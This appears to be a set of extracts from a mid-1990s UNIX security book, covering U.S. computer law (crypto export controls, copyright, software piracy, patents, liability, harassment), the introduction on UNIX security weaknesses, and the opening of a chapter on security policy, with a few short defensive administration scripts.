The law is changing rapidly in the areas of computer use and abuse. It is also changing rapidly with<br />

regard to networks and network communication. We cannot hope to provide information here that will be<br />

up-to-date for very long. For instance, one outstanding reference in this area, <strong>Internet</strong> & Network Law<br />

1995, by William J. Cook[5] summarizes some of the recent rulings in computer and network law in the<br />

year 1995. Mr. Cook's report has almost 70 pages of case summaries and incidents, all of which represent<br />

recent decisions. As more people use computers and networks, and as more commercial interests are tied<br />

into computing, we can expect the pace of new legislation, legal decisions, and other actions to increase.<br />

Therefore, as with any other aspect of the law, you are advised to seek competent legal counsel if you<br />

have any questions about whether these concerns may apply to you.[6] Keep in mind that the law<br />

functions with a logic all its own - one that is puzzling and confounding to people who work with<br />

software. The law is not necessarily logical and fair, nor does it always embody common sense.<br />

[5] Of the law firm Willian Brinks Hofer Gilson & Lione in Chicago.<br />

[6] And don't make it a one-time visit, either. With the rapid pace of change, you need to<br />

track the changes if there is any chance that you might be affected by adverse changes in the<br />

law.<br />

26.4.1 Munitions Export<br />

In <strong>Sec</strong>tion 6.7.2, "Cryptography and Export Controls", we described some of the export control<br />

regulations in effect in the United States. Although largely quite silly and short-sighted, they are<br />

nonetheless the law and you may encounter problems if you are in violation.<br />

One reading of the regulations suggests that anyone who exports encryption software outside the country,<br />

or makes it available to foreign nationals who are not permanent residents, is in violation of the statutes<br />

unless a license is obtained first; such licenses are notoriously difficult to obtain. It may also be the case<br />

that granting access to certain forms of advanced supercomputing equipment (even granting accounts) to<br />

foreign nationals is in violation of the law.<br />

You may believe that you are not exporting any prohibited software. However, stop and think for a<br />


moment. Does your anonymous FTP repository contain encryption software of any kind? Does your<br />

WWW server have any pages with encryption software? Do you run a mailing list or remailer that can be<br />

used to send encryption software outside the U.S.? If the answer to any of those is "yes," you should<br />

consider seeking legal advice on this issue as you may be classified as an "exporter." Violation of the<br />

export control acts are punishable (upon conviction) with hefty fines and long jail terms.<br />

A further potential violation involves access to the software by non-citizens. If any of your employees (or<br />

students) are not U.S. citizens or permanent residents, and if they have access to encryption software or<br />

advanced computing hardware, you are likely to be in violation of the law. Note that one interpretation of<br />

the law implies that if you only provide an account that is used by someone else to obtain controlled<br />

software you may still be liable. (If you do, you are probably in good company, because nearly all major<br />

universities and software vendors in the country are in the same position. This fact may be little comfort<br />

if Federal agents show up at your door, however.)<br />

An even more bizarre and interesting aspect of the law indicates that you may be in violation of the<br />

export control laws if you provide encryption software to U.S. citizens living and working in the U.S. -<br />

provided that they are working for a company under non-U.S. control. Thus, even if you are a U.S.<br />

citizen, and you download a copy of PGP or DES to your workstation in your office (in Washington,<br />

Chicago, Atlanta, Houston, Phoenix, Portland, Los Angeles, Fairbanks, or Honolulu), you are now an<br />

international arms exporter and potential criminal if your company is majority owned or controlled by<br />

parties outside the U.S. This liability is personal, not corporate.<br />

The whole matter of export controls on encryption software is under study by various government<br />

groups, and is the subject of several lawsuits in Federal court. The status of this situation will<br />

undoubtedly change in the next few years. We hope that it will change to something more reasonable, but<br />

you should be sure to stay informed.<br />

26.4.2 Copyright Infringement<br />

Items other than software can be copyrighted. Images in your WWW pages, sound clips played through<br />

your gopher and WWW servers, and documents you copied from other sites to pad your own collection<br />

all have copyrights associated with them. On-line databases, computer programs, and electronic mail are<br />

copyrighted as well. The law states that as soon as something is expressed in a tangible form, it has a<br />

copyright associated with it. Thus, as soon as the bits are on your disk, they are copyrighted, whether a<br />

formal notice exists or not.<br />

The standard practice on the <strong>Internet</strong> has been that something exported with a public-access server is for<br />

public use, unless otherwise noted. However, this practice is not in keeping with the way the law is<br />

currently phrased. Furthermore, some items that you obtain from an intermediate party may have had<br />

owner and copyright information removed. This does not absolve you of any copyright liability if you<br />

use that material.<br />

In particular, recent rulings in various courts have found that under certain circumstances system<br />

operators can be sued as a contributing party, and thus held partially liable, for copyright infringement<br />

committed by users of their systems. Types of infringement include:<br />

● Posting pictures, artwork, and images on FTP sites and WWW sites without appropriate permission, even if the items are not clearly identified regarding owner, subject, or copyright.

● Posting excerpts from books, reports, and other copyrighted materials via mail, FTP, or Usenet postings.

● Posting sound clips from films, TV shows, or other recorded media without approval of the copyright holders.

● Posting scanned-in cartoons from newspapers or magazines.

● Reposting news articles from copyrighted sources.

● Reposting of email. Like paper mail, email has a copyright held by the author of the email as soon as it is put in tangible form. The act of sending the mail to someone does not give the recipient copyright interest in the email. Standard practice on the net is not in keeping with the way the law is written. Thus, forwarding email may technically be a violation of the copyright law.

The best defense against possible lawsuits is to carefully screen everything you post or make available to<br />

be certain you know its copyright status. Furthermore, make all your users aware of the policy you set in<br />

this regard, and then periodically audit to ensure that the policy is followed. Having an unenforced policy<br />

will likely serve you as well as no policy - that is, not at all.<br />

Also, beware of "amateur lawyers" who tell you that reuse of an image or article is "fair use" under the<br />

law. There is a very precise definition of fair use, and you should get the opinion from a real lawyer who<br />

knows the issues. After all, if you get sued, do you think that a reference to an anonymous post in the<br />

alt.erotica.lawyers.briefs Usenet newsgroup is going to convince the judge that you took due diligence to<br />

adhere to the law?<br />

If anyone notifies you that you are violating their copyright with something you have on your system,<br />

you should investigate immediately. Any delay could cause additional problems. (However, we are not<br />

necessarily advocating that you pull your material from the network any time you get a complaint.)<br />

26.4.2.1 Software piracy and the SPA<br />

The Software Publishers Association (SPA) is one of several organizations funded by major software<br />

publishers. One of its primary goals is to cut down on the huge amount of software piracy that is<br />

regularly conducted worldwide. Although each individual act of unauthorized software copying and use<br />

may only deprive the vendor of a few hundred dollars at most, the sheer number of software pirates in

operation makes the aggregate losses staggering: worldwide losses are estimated in the billions of dollars<br />

per year. Figures from various sources cited by Mr. Cook in <strong>Internet</strong> & Network Law 1995 indicate:<br />

● Worldwide losses from software piracy alone may be as high as $15 billion per year.

● 94% of the software in the People's Republic of China is pirated.

● 92% of the software in use in Japan is pirated.

● 50% of the software in use in Canada is pirated.

Although there are criminal penalties for unauthorized copying, these penalties are employed only against organized piracy operations. Instead, the SPA and others rely on civil-law remedies. In particular, the SPA can obtain a court order to examine your computer systems for evidence of


unlicensed copies of software. Should such copies be found without supporting documentation to show<br />

valid licenses, you may be subject to a lawsuit resulting in substantial damages. Many companies and<br />

universities have settled with the SPA with regard to these issues, with fines totaling in the many<br />

hundreds of thousands of dollars. This amount is in addition to the many thousands of dollars paid to<br />

vendors for any unlicensed software that is found.<br />

Although the SPA has primarily focused on software piracy in the PC domain, it will probably expand its scope into the UNIX marketplace as more shrink-wrapped software becomes available for

<strong>UNIX</strong> machines. Of additional concern are the new generations of emulators that let your <strong>UNIX</strong> machine<br />

operate as a "PC" inside a window on your workstation. These emulators run PC software as well as (and<br />

sometimes faster than) a plain desktop PC. The danger is having unlicensed PC software on your<br />

workstations for use in these emulators.<br />

A further danger involves your users. If some of your users are running a clandestine "warez" site from<br />

your FTP server, the SPA or vendors might conceivably seek financial redress from you to help cover the<br />

loss, even if you do not know about the server and otherwise don't condone the behavior.[7]<br />

[7] Whether they would succeed in such an action is something we cannot know. However,<br />

almost anything is possible if a talented attorney were to press the case.<br />

Your best defense in these circumstances is to clearly state to your users that no unlicensed use or<br />

possession of software is allowed under any circumstances. Having internal audits of software is one way<br />

you can check compliance with this policy. If software cannot be documented as paid for and original,<br />

then it should be deleted. Having up-to-date and per-machine log books is one way to track versions of<br />

software.<br />
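One way to keep such per-machine records current is to generate the inventory automatically and file it with the purchase records. The following Bourne-shell sketch is only an illustration of the idea - the directories scanned and the output location are assumptions you would adapt to your own site:

    #!/bin/sh
    # Sketch: record the locally installed software on this machine so the listing
    # can be checked against purchase records and license documentation.
    # The directories and output file below are examples only.
    HOST=`hostname`
    INVENTORY=/var/adm/sw-inventory.$HOST

    {
        echo "Software inventory for $HOST on `date`"
        # List each locally installed program with its size and modification date.
        ls -l /usr/local/bin /usr/local/sbin 2>/dev/null
        # Record checksums so a later audit can spot added or replaced binaries.
        find /usr/local/bin -type f -print | xargs sum 2>/dev/null
    } > $INVENTORY

    chmod 600 $INVENTORY

Comparing successive inventories with diff then gives you a dated record of what appeared on each machine and when.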

26.4.3 Trademark Violations<br />

Note that use of trademark phrases, symbols, and insignia without the permission of the holders of the<br />

trademark may lead to difficulties. In particular, don't put corporate logos on your WWW pages without<br />

permission from the corporations involved. Holders of trademarks must carefully regulate and control the<br />

manner in which their trademarks are used, or they lose protection of them. That means that you will<br />

probably hear from a corporate attorney if you put the logos for Sun, HP, Xerox, Microsoft, Coca-Cola,<br />

or other trademark holders on your WWW pages.<br />

26.4.4 Patent Concerns<br />

We've mentioned patent concerns elsewhere in the book. Firms and individuals are applying for (and<br />

receiving) patents on software and algorithms at an astonishing rate. Despite the wording of the<br />

Constitution and laws on patents, the Patent Office is continuing to award patents on obvious ideas,<br />

trivial advances, and pure algorithms. In the middle of 1995, they effectively granted patent protection to<br />

a prime number as well![8]<br />

[8] Patent 5,373,560 covering the use of the prime number 98A3DF52 AEAE9799<br />

325CB258 D767EBD1 F4630E9B 9E21732A 4AFB1624 BA6DF911 466AD8DA<br />

960586F4 A0D5E3C3 6AF09966 0BDDC157 7E54A9F4 02334433 ACB14BCB was<br />

granted on December 13, 1994 to Roger Schlafly of California. Although the patent only<br />


covers the use of the number when used with Schlafly's algorithm, there is no other practical

use for this particular number, because it is easier (and more practical) to generate a<br />

"random" prime number than to use this one.<br />

The danger comes when you write some new code that involves an algorithm you read about, or simply<br />

developed based on obvious prior art. You may discover, when you try to use this in a wider market, that<br />

lawyers from a large corporation will tell you that you cannot use "their" algorithm in your code because<br />

it is covered by their patent. After a patent is granted, the patent holder controls the use of the patented<br />

item for 20 years from the date of filing - you aren't even supposed to use it for experimental purposes<br />

without their approval and/or license!<br />

Many companies are now attempting to build up huge libraries of patents to use as leverage in the<br />

marketplace. In effect, they are submitting applications on everything they develop. This practice is<br />

sad,[9] because it will have an inhibitory effect on software development in the years to come. It is also<br />

sad to see business switch from a mode of competing based on innovation to a mode of competing based<br />

on who has the biggest collection of dubious patents.<br />

[9] Indeed, it already has had negative effects. For instance, the patents on public key<br />

encryption have really hurt information security development in recent years.<br />

Until the courts or Congress step in to straighten out this mess, there is not much you can do to protect<br />

yourself (directly). However, we suggest that you pursue some of the references given in Appendix D,<br />

Paper Sources to further educate yourself on the issues involved. Then consider contacting your elected<br />

representatives to make your views on the matter known.<br />

26.4.5 Pornography and Indecent Material<br />

Every time a new communications medium is presented, pornography and erotica seem to be distributed<br />

using it. Unfortunately, we live in times in which there are people in positions of political and legal<br />

influence who believe that they should be able to define what is and is not proper, and furthermore<br />

restrict access to that material. This belief, coupled with the fact that U.S. standards of acceptability of<br />

nudity and erotic language are stricter than in many places in the world, leads to conflict on the

networks.<br />

As this book goes to press, Congress has passed a law that makes it a criminal offense to put "indecent"<br />

material on a computer where a minor might encounter it. We have also heard of cases in which people<br />

have had their computers confiscated for having on disk a computer image - one they were unaware was present - that depicted activities someone decided violated "community standards." There have

also been cases where individuals in one state have been convicted of pornography charges in another<br />

state, even though the material was not considered obscene in the state where the system was normally<br />

accessed. And last of all, you can be in serious legal trouble for simply FTPing an image of a naked<br />

minor, even if you don't know what is in the image at the time you fetch it.<br />

Many of these laws are currently being applied selectively. In several cases, individuals have been<br />

arrested for downloading child pornography from several major online service providers. In the United<br />

States, the mere possession of child pornography is a crime. Yet the online service providers have not<br />

been harassed by law enforcement, even though the same child pornography resided on the online<br />

services' systems.<br />


We won't comment on the nature of the laws involved, or the fanatic zeal with which some people pursue<br />

prosecution under these statutes. We will observe that if you or your users have images or text online (for<br />

FTP, WWW, Usenet, or otherwise) that may be considered "indecent" or "obscene," you may wish to<br />

discuss the issue with legal counsel. In general, the U.S. Constitution protects most forms of expression<br />

as "free speech." However, prosecution may be threatened or attempted simply to intimidate and cause<br />

economic hardship: this is not prohibited by the Constitution.<br />

We should also point out that as part of any sensible security administration, you should know what you<br />

have on your computer, and why. Keep track of who is accessing material you provide, and beware of<br />

unauthorized use.<br />

26.4.6 Liability for Damage<br />

Suppose that one of your users puts up a nifty new program on your anonymous FTP site for people to<br />

use. It claims to protect any system against some threat, or fixes a vendor flaw. Someone at the Third<br />

National Bank of Hoople downloads it and runs the program, and the system then crashes, leading to<br />

thousands of dollars in damages.<br />

Or perhaps you are browsing the WWW and discover an applet in a language such as Java that you find<br />

quite interesting. You install a link to it from your home page. Unfortunately, someone on the firewall<br />

machine at Big Whammix, Inc. clicks on the link and the applet somehow interacts with the firewall code<br />

to open an internal network to hackers around the world.<br />

If your response to such incidents is, "Too bad. Software does that sometimes," then you are living<br />

dangerously. Legal precedent is such that you might be liable, at least partially, for damages in cases<br />

such as these. You could certainly be sued and need to answer in court to such charges, and that is not a<br />

pleasant experience. Think about explaining how you designed and tested the code, how you documented<br />

it, and how you warned other users about potential defects and side effects. How about the implied<br />

warranty?<br />

Simply because "everyone on the net" does something does not mean that a judge and jury will agree that you aren't responsible for some of the mess that action causes. There have been many times in the history of the United States when people have been successfully sued for activity that was

widespread. The mere fact that "everybody was doing it" did not stop some particular individuals from<br />

being found liable.<br />

In general, you should get expert legal advice before providing any executable code to others, even if you<br />

intend to give the code away.<br />

26.4.7 Harassment, Threatening Communication, and Defamation<br />

Computers and networks give us great opportunities for communicating with the world. In a matter of<br />

moments, our words can be speeding around the world destined for someone we have never met in<br />

person, or for a large audience. Not only is this ability liberating and empowering, it can be very<br />

entertaining. Mailing lists, "chat rooms," MUDs, newsgroups, and more all provide us with news and

entertainment.<br />

Unfortunately, this same high-speed, high-bandwidth communications medium can also be used for<br />


less-than-noble purposes. Email can be sent to harass someone, news articles can be posted to slander<br />

someone, and online chats can be used to threaten someone with harm.<br />

In the world of paper and telephones, there are legal remedies to harassing and demeaning<br />

communication. Some of those remedies are already being applied to the online world. We have seen<br />

cases of people being arrested for harassment and stalking online, and sued (successfully) for slander in<br />

posted Usenet articles. There have also been cases filed for violation of EEOC laws because of repeated<br />

postings that are sexually, racially, or religiously demeaning.[10]<br />

[10] Note that the use of screen savers with inappropriate images can also contribute to such<br />

complaints.<br />

Words can hurt others, sometimes quite severely. Often, words are a prelude or indicator of other<br />

potential harm, including physical harm. For this reason, you must have policies in place prohibiting<br />

demeaning or threatening postings and mailings from work-related accounts.[11] We further suggest that<br />

you have a policy in place prohibiting any form of anonymous posting or mailing from the workplace.<br />

[11] We are strong advocates of free speech, and are bothered by too much "political<br />

correctness." However, free speech and artistic expression are not usually part of one's job<br />

function in most environments. Expression should be allowed from personal accounts<br />

outside the workplace, and those doing the expressing should be held accountable for the<br />

consequences of their speech.<br />



Chapter 1

Introduction

1.4 Security and UNIX

Dennis Ritchie wrote about the security of <strong>UNIX</strong>: "It was not designed from the start to be secure. It was<br />

designed with the necessary characteristics to make security serviceable."<br />

<strong>UNIX</strong> is a multi-user, multi-tasking operating system. Multi-user means that the operating system allows<br />

many different people to use the same computer at the same time. Multi-tasking means that each user can<br />

run many different programs simultaneously.<br />

One of the natural functions of such operating systems is to prevent different people (or programs) using<br />

the same computer from interfering with each other. Without such protection, a wayward program<br />

(perhaps written by a student in an introductory computer science course) could affect other programs or<br />

other users, could accidentally delete files, or could even crash (halt) the entire computer system. To<br />

keep such disasters from happening, some form of computer security has always had a place in the <strong>UNIX</strong><br />

design philosophy.<br />

But <strong>UNIX</strong> security provides more than mere memory protection. <strong>UNIX</strong> has a sophisticated security<br />

system that controls the ways users access files, modify system databases, and use system resources.<br />

Unfortunately, those mechanisms don't help much when the systems are misconfigured, are used<br />

carelessly, or contain buggy software. Nearly all of the security holes that have been found in <strong>UNIX</strong> over<br />

the years have resulted from these kinds of problems rather than from shortcomings in the intrinsic<br />

design of the system. Thus, nearly all <strong>UNIX</strong> vendors believe that they can (and perhaps do) provide a<br />

reasonably secure <strong>UNIX</strong> operating system. However, there are influences that work against better<br />

security.<br />

1.4.1 Expectations<br />

The biggest problem with improving <strong>UNIX</strong> security is arguably one of expectation. Many users have<br />

grown to expect <strong>UNIX</strong> to be configured in a particular way. Their experience with <strong>UNIX</strong> in academic<br />

and research settings has always been that they have access to most of the directories on the system and<br />

that they have access to most commands. Users are accustomed to making their files world-readable by<br />

default. Users are also often accustomed to being able to build and install their own software, often<br />

requiring system privileges to do so. The trend in "free" versions of <strong>UNIX</strong> for personal computer systems<br />

has amplified these expectations.<br />

Unfortunately, all of these expectations are contrary to good security practice in the business place. To<br />

have stronger security, system administrators must often curtail access to files and commands that are not<br />


strictly needed for users to do their jobs. Thus, someone who needs email and a text processor for his<br />

work should not also expect to be able to run the network diagnostic programs and the C compiler.<br />

Likewise, to heighten security, users should not be able to install software that has not been examined<br />

and approved by a trained and authorized individual.<br />

The tradition of open access is strong, and is one of the reasons that <strong>UNIX</strong> has been attractive to so many<br />

people. Some users argue that to restrict these kinds of access would make the systems something other<br />

than <strong>UNIX</strong>. Although these arguments may be valid, in instances where strong security is required,<br />

restrictive measures may be needed.<br />

At the same time, administrators can strengthen security by applying some general security principles, in<br />

moderation. For instance, rather than removing all compilers and libraries from each machine, the tools<br />

can be protected so that only users in a certain user group can access them. Users with a need for such<br />

access, and who can be trusted to take due care, can be added to this group. Similar methods can be used<br />

with other classes of tools, too, such as network monitoring software or Usenet news programs.<br />
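For example, the following Bourne-shell commands sketch one way to do this; the group name (devel), the user names, and the compiler paths shown are assumptions, and the actual locations of the compiler and linker vary from vendor to vendor:

    # Sketch: limit use of the C compiler to members of a "devel" group.
    # Group name, user names, and paths are examples only.
    groupadd devel                      # or add the group to /etc/group by hand
    chgrp devel /usr/bin/cc /usr/bin/ld
    chmod 750 /usr/bin/cc /usr/bin/ld   # owner and group only; no access for others

    # Then list the trusted users in the devel entry in /etc/group, for example:
    #   devel::102:alice,bob

The same approach works for network monitoring tools and other programs you want to keep out of general circulation.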

Furthermore, changing the fundamental view of data on the system can be beneficial: from readable by<br />

default to unreadable by default. For instance, user files and directories should be protected against read<br />

access instead of being world-readable by default. Setting file access control values appropriately and<br />

using shadow password files are just two examples of how this simple change in system configuration<br />

can improve the overall security of <strong>UNIX</strong>.<br />
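As a small illustration, the commands below tighten the default file-creation mask and existing home directories. This is a sketch only: the profile file, the home-directory location, and the pwconv command for enabling shadow passwords all vary among UNIX versions.

    # Sketch: move from "readable by default" toward "unreadable by default."
    # File locations and commands are examples; check your vendor's documentation.

    # New files created by users will no longer be world-readable.
    echo 'umask 077' >> /etc/profile

    # Remove group and world access from existing home directories.
    for dir in /home/*; do
        [ -d "$dir" ] && chmod go-rwx "$dir"
    done

    # Enable shadow passwords where the system supports it.
    pwconv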

The most critical aspect of enhancing <strong>UNIX</strong> security is that the users themselves participate in the<br />

alteration of their expectations. The best way to meet this goal is not by decree, but through education<br />

and motivation. Many users started using <strong>UNIX</strong> in an environment less threatening than they face today.<br />

By educating users about the dangers and how their cooperation can help to thwart those dangers, the

security of the system is increased. By properly motivating the users to participate in good security<br />

practice, you make them part of the security mechanism. Better education and motivation work well only<br />

when applied together, however; education without motivation may not be applied, and motivation<br />

without education leaves gaping holes in what is done.<br />

1.4.2 Software Quality<br />

Much of the <strong>UNIX</strong> operating system and utilities that people take for granted was written as student<br />

projects, or as quick "hacks" by software developers inside research labs. These programs were not<br />

formally designed and tested: they were put together and debugged on the fly. The result is a large<br />

collection of tools that usually work, but sometimes fail in unexpected and spectacular ways. Utilities<br />

were not the only things written by students. Much of BSD <strong>UNIX</strong>, including the networking code, was<br />

written by students as research projects of one sort or another - and these efforts sometimes ignored<br />

existing standards and conventions.<br />

This analysis is not intended to cast aspersions on the abilities of students; rather, it points out that

today's <strong>UNIX</strong> was not created as a carefully designed and tested system. Indeed, a considerable amount<br />

of the development of <strong>UNIX</strong> and its utilities occurred at a time when good software engineering tools<br />

and techniques were not yet developed or readily available.[7] The fact that occasional bugs are<br />

discovered that result in compromises of the security of the system is no wonder; the fact that so few<br />

bugs are evident is perhaps the real wonder!<br />


[7] Some would argue that they are still not available. Few academic environments currently<br />

have access to modern software engineering tools because of their cost, and few vendors are<br />

willing to provide copies at prices that academic institutions can afford.<br />

Unfortunately, two things are not occurring as a result of the discovery of faults in the existing code. The<br />

first is that software designers are not learning from past mistakes. For instance, buffer overruns (mostly<br />

resulting from fixed-length buffers and functions that do not check their arguments) have been<br />

recognized as a major <strong>UNIX</strong> problem area for some time, yet software continues to be discovered<br />

containing such bugs, and new software is written without consideration of these past problems. For<br />

instance, a fixed-length buffer overrun in the gets() library call was one of the major propagation modes

of the Morris <strong>Internet</strong> worm of 1988, yet, as we were working on the second edition of this book in late<br />

1995, news of yet another buffer-overrun security flaw surfaced - this time in the BSD-derived syslog()<br />

library call. It is inexcusable that vendors continue to ship software with these kinds of problems in<br />

place.<br />
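You usually cannot fix the vendor's libraries yourself, but you can at least find out which installed programs still reference calls such as gets(). The following rough sketch assumes unstripped binaries, the standard nm utility, and example directories; on systems that strip their binaries or prefix symbols with an underscore, it will need adjustment.

    # Sketch: report installed programs that appear to reference the unsafe gets() call.
    # Only works on binaries that still carry a symbol table; directories are examples.
    for prog in /usr/bin/* /usr/local/bin/*; do
        [ -f "$prog" ] || continue
        # A trailing " gets" match avoids also matching the safer fgets().
        if nm "$prog" 2>/dev/null | grep ' gets$' > /dev/null; then
            echo "$prog appears to use gets()"
        fi
    done

Programs flagged this way are candidates for replacement, recompilation with fgets(), or at least closer scrutiny.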

A more serious problem than any particular flaw is the fact that few, if any, vendors are performing an<br />

organized program of testing on the software they provide. Although many vendors test their software for<br />

compliance with industry "standards," few apparently test their software to see what it does when<br />

presented with unexpected data or conditions. With as much as 40% of the utilities on some machines<br />

being buggy,[8] one might think that vendors would be eager to test their versions of the software and to<br />

correct lurking bugs. However, as more than one vendor's software engineer has told us, "The customers

want their <strong>UNIX</strong> - including the flaws - exactly like every other implementation. Furthermore, it's not<br />

good business: customers will pay extra for performance, but not for better testing."<br />

[8] See the reference to the paper by Barton Miller, et al., given in Appendix D.<br />

As long as the customers demand strict conformance of behavior to existing versions of the programs,<br />

and as long as software quality is not made a fundamental purchase criterion by those same customers,<br />

vendors will most likely do very little to systematically test and fix their software. Formal standards, such<br />

as the ANSI C standard and POSIX standard help perpetuate and formalize these weaknesses, too. For<br />

instance, the ANSI C standard[9] perpetuates the gets() library call, forcing <strong>UNIX</strong> vendors to support the<br />

call, or to issue systems at a competitive disadvantage because they are not in compliance with the<br />

standard.[10]<br />

[9] ANSI X3J11<br />

[10] See Appendix D for references describing this scenario.<br />

1.4.3 Add-On Functionality Breeds Problems<br />

One final influence on <strong>UNIX</strong> security involves the way new functionality has been added over the years.<br />

<strong>UNIX</strong> is often cited for its flexibility and reuse characteristics; therefore, new functions are constantly<br />

built on top of <strong>UNIX</strong> platforms and eventually integrated into released versions. Unfortunately, the<br />

addition of new features is often done without understanding the assumptions that were made with the<br />

underlying mechanisms and without concern for the added complexity presented to the system operators<br />

and maintainers. Applying the same features and code in a heterogeneous computing environment can<br />

also lead to problems.<br />


As a special case, consider how large-scale computer networks such as the <strong>Internet</strong> have dramatically<br />

changed the security ground rules from those under which <strong>UNIX</strong> was developed. <strong>UNIX</strong> was originally<br />

developed in an environment where computers did not connect to each other outside of the confines of a<br />

small room or research lab. Networks today interconnect tens of thousands of machines, and millions of<br />

users, on every continent in the world. For this reason, each of us confronts issues of computer security<br />

directly: a doctor in a major hospital might never imagine that a postal clerk on the other side of the<br />

world could pick the lock on her desk drawer to rummage through her files, yet this sort of thing happens

on a regular basis to "virtual desk drawers" on the <strong>Internet</strong>.<br />

Most colleges and many high schools now grant network access to all of their students as a matter of<br />

course. The number of primary schools with network access is also increasing, with initiatives in many<br />

U.S. states to put a networked computer in every classroom. Granting telephone network access to a<br />

larger number of people increases the chances of telephone abuse and fraud, just as granting

widespread computer network access increases the chances that the access will be used for illegitimate<br />

purposes. Unfortunately, the alternative of withholding access is equally unappealing. Imagine operating<br />

without a telephone because of the risk of receiving prank calls!<br />

The foundations and traditions of <strong>UNIX</strong> network security, however, were profoundly shaped by the<br />

earlier, more restricted view of networks, and not by our more recent experiences. For instance, the<br />

concept of user IDs and group IDs controlling access to files was developed at a time when the typical<br />

UNIX machine was in a physically secure environment. On top of this were added remote manipulation

commands such as rlogin and rcp that were designed to reuse the user-ID/group-ID paradigm with the<br />

concept of "trusted ports" for network connections. Within a local network in a closed lab, using only<br />

relatively slow computers, this design (usually) worked well. But now, with the proliferation of<br />

workstations and non-<strong>UNIX</strong> machines on international networks, this design, with its implicit<br />

assumptions about restricted access to the network, leads to major weaknesses in security.[11]<br />

[11] Peter Salus notes in his fine history Casting the Net: From Arpanet to <strong>Internet</strong> and<br />

Beyond... (Addison-Wesley, 1995), that Bob Metcalfe warned of these dangers in 1973, in

RFC 602. That warning, and others like it, went largely unheeded.<br />

Not all of these unsecure foundations were laid by UNIX developers. The IP protocol suite on which the Internet is based was initially developed outside of UNIX, and it was developed without sufficient concern for authentication and confidentiality. This lack of concern has enabled recent cases of password sniffing and IP sequence spoofing to occur, and to make news as "sophisticated" attacks.[12] (These

attacks are discussed in Chapter 16, TCP/IP Networks.)<br />

[12] To be fair, the designers of TCP/IP were aware of many of the problems. However,<br />

they were more concerned about making everything work, so they did not address many of

the problems in their design. The problems are really more the fault of people trying to build<br />

critical applications on an experimental set of protocols before the protocols were properly<br />

refined - a familiar problem.<br />

Another facet of the problem has to do with the "improvements" made by each vendor. Rather than<br />

attempting to provide a unified, simple interface to system administration across platforms, each vendor<br />

has created a new set of commands and functions. In many cases, improvements to the command set<br />

have been available to the administrator. However, there are also now hundreds (perhaps thousands) of<br />

new commands, options, shells, permissions, and settings that the administrator of a heterogeneous<br />


computing environment must understand and remember. Additionally, many of the commands and<br />

options are similar to each other, but have different meanings depending on the environment in which<br />

they are used. The result can often be disaster when the poor administrator suffers momentary confusion<br />

about the system or has a small lapse in memory. This complexity further complicates the development<br />

of tools that are intended to provide cross-platform support and control. For a "standard" operating<br />

system, <strong>UNIX</strong> is one of the most nonstandard systems to administer.<br />

That such difficulties arise is both a tribute to <strong>UNIX</strong>, and a condemnation. The robust nature of <strong>UNIX</strong><br />

enables it to accept and support new applications by building on the old. However, existing mechanisms<br />

are sometimes completely inappropriate for the tasks assigned to them. Rather than being a<br />

condemnation of <strong>UNIX</strong>, such shortcomings are actually an indictment of the developers for failing to<br />

give more consideration to the human and functional ramifications of building on the existing<br />

foundation.<br />

Here, then, is a conundrum: to rewrite large portions of <strong>UNIX</strong> and the protocols underlying its<br />

environment, or to fundamentally change its structure, would be to attack the very reasons <strong>UNIX</strong> has<br />

become so widely used. Furthermore, such restructuring would be contrary to the spirit of standardization<br />

that has been a major factor in the recent wide acceptance of <strong>UNIX</strong>. At the same time, without<br />

reevaluation and some restructuring, there is serious doubt about the level of trust that can be placed in<br />

the system. Ironically, the same spirit of development and change is what has led <strong>UNIX</strong> to its current<br />

niche.<br />




Chapter 2<br />

2. Policies and Guidelines<br />

Contents:<br />

Planning Your <strong>Sec</strong>urity Needs<br />

Risk Assessment<br />

Cost-Benefit Analysis<br />

Policy<br />

The Problem with <strong>Sec</strong>urity Through Obscurity<br />

Fundamentally, computer security is a series of technical solutions to non-technical problems. You can<br />

spend an unlimited amount of time, money, and effort on computer security, but you will never quite<br />

solve the problem of accidental data loss or intentional disruption of your activities. Given the right set of<br />

circumstances - software bugs, accidents, mistakes, bad luck, bad weather, or a motivated and<br />

well-equipped attacker - any computer can be compromised, rendered useless, or worse.<br />

The job of the security professional is to help organizations decide how much time and money need to be<br />

spent on security. Another part of that job is to make sure that organizations have policies, guidelines,<br />

and procedures in place so that the money spent is spent well. And finally, the professional needs to audit<br />

the system to ensure that the appropriate controls are implemented correctly to achieve the policy's goals.<br />

Thus, practical security is really a question of management and administration more than it is one of<br />

technical skill. Consequently, security must be a priority of your firm's management.<br />

This book divides the process of security planning into six discrete steps:<br />

1. Security needs planning

2. Risk assessment

3. Cost-benefit analysis

4. Creating policies to reflect your needs

5. Implementation

6. Audit and incident response

This chapter covers security planning, risk assessment, cost-benefit analysis, and policy-making.<br />

Implementation is covered by many of the chapters of this book. Audit is described in Chapter 10,<br />


Auditing and Logging, and incident response in Chapter 17, TCP/IP Services through Chapter 26,<br />

Computer <strong>Sec</strong>urity and U.S. Law.<br />

There are two critical principles implicit in effective policy and security planning:<br />

● Policy and security awareness must be driven from the top down in the organization. Security concerns and awareness by the users are important, but they cannot build or sustain an effective culture of security. Instead, the head(s) of the organization must treat security as important, and abide by all the same rules and regulations as everyone else.

● Effective computer security means protecting information. All plans, policies and procedures should reflect the need to protect information in whatever form it takes. Proprietary data does not become worthless when it is on a printout or is faxed to another site instead of contained in a disk file. Customer confidential information does not suddenly lose its value because it is recited on the phone between two users instead of contained within an email message. The information should be protected no matter what its form.

2.1 Planning Your <strong>Sec</strong>urity Needs<br />

A computer is secure if it behaves the way that you expect it will.<br />

There are many different kinds of computer security, and many different definitions. Rather than present<br />

a formal definition, this book takes the practical approach and discusses the categories of protection you<br />

should consider. We believe that secure computers are usable computers, and, likewise, that computers<br />

that cannot be used, for whatever the reason, are not very secure.<br />

Within this broad definition, there are many different kinds of security that both users and administrators<br />

of computer systems need to be concerned about:<br />

Confidentiality<br />

Protecting information from being read or copied by anyone who has not been explicitly<br />

authorized by the owner of that information. This type of security includes not only protecting the<br />

information in toto, but also protecting individual pieces of information that may seem harmless by<br />

themselves but that can be used to infer other confidential information.<br />

Data integrity<br />

Protecting information (including programs) from being deleted or altered in any way without the<br />

permission of the owner of that information. Information to be protected also includes items such<br />

as accounting records, backup tapes, file creation times, and documentation.<br />

Availability<br />

Protecting your services so they're not degraded or made unavailable (crashed) without<br />

authorization. If the system is unavailable when an authorized user needs it, the result can be as<br />

bad as having the information that resides on the system deleted.<br />

Consistency<br />

Making sure that the system behaves as expected by the authorized users. If software or hardware<br />


suddenly starts behaving radically differently from the way it used to behave, especially after an<br />

